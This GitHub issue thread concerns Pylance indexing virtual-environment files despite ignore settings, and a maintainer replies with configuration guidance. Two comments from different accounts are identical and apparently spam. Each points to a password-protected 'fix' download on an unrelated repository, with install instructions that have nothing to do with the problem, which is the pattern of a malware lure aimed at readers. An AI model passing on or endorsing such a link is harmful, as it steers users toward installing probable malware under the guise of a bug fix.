### ISSUE TITLE
analysis virtual env

### ISSUE THREAD

**Issue by Arthur-CWW** [microsoft/pylance-release#6320]
Type: <b>Bug</b>

Pylance indexes 10000s of files in my my virtual envs even though the paths are in in my analysis.ignore

Extension version: 2024.8.1
VS Code version: Cursor 0.40.1 (58b91712431381a1b75817cd3437cee35dddcb30, 2024-08-24T02:52:24.035Z)
OS version: Linux x64 6.5.0-1027-oem
Modes:

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|AMD Ryzen 5 7640U w/ Radeon 760M Graphics (12 x 4240)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: disabled_off<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: disabled_software<br>vulkan: disabled_off<br>webgl: enabled<br>webgl2: enabled<br>webgpu: disabled_off|
|Load (avg)|2, 4, 4|
|Memory (System)|58.54GB (23.90GB free)|
|Process Argv|--no-sandbox|
|Screen Reader|no|
|VM|0%|
|DESKTOP_SESSION|ubuntu|
|XDG_CURRENT_DESKTOP|Unity|
|XDG_SESSION_DESKTOP|ubuntu|
|XDG_SESSION_TYPE|x11|
</details>

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by heejaechang** [comment]
see https://github.com/microsoft/pylance-release/wiki/Opening-Large-Workspaces-in-VS-Code on how to configure workspace. especially on how to configure it manually.

I think things are not setup correctly for workspace. or you could share us `log` as described in [the troubleshooting guide](https://github.com/microsoft/pylance-release/wiki/Collecting-data-for-an-investigation.#collecting-trace-logs)? so we can take a look together.
